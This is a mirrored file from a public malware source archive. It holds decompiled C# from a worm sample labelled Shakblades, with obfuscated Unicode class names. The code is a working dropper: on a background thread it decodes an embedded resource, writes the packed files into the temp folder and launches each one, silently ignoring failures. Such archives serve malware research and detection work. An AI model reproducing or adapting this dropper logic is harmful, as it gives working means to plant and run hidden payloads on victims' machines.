mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
38 lines
1.3 KiB
C#
38 lines
1.3 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.෧ᠮबZố
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Resources;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
internal class \u09D0෧ᠮबZố
|
|||
|
{
|
|||
|
public static void ᬪ() => new Thread((ThreadStart) (() =>
|
|||
|
{
|
|||
|
BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷((byte[]) new ResourceManager("b", Assembly.GetExecutingAssembly()).GetObject("b"), false)));
|
|||
|
while (binaryReader.PeekChar() != -1)
|
|||
|
{
|
|||
|
string str = binaryReader.ReadString();
|
|||
|
int count = binaryReader.ReadInt32();
|
|||
|
byte[] bytes = binaryReader.ReadBytes(count);
|
|||
|
try
|
|||
|
{
|
|||
|
if (!File.Exists(Path.GetTempPath() + str))
|
|||
|
File.WriteAllBytes(Path.GetTempPath() + str, bytes);
|
|||
|
Process.Start(Path.GetTempPath() + str);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
})).Start();
|
|||
|
}
|
|||
|
}
|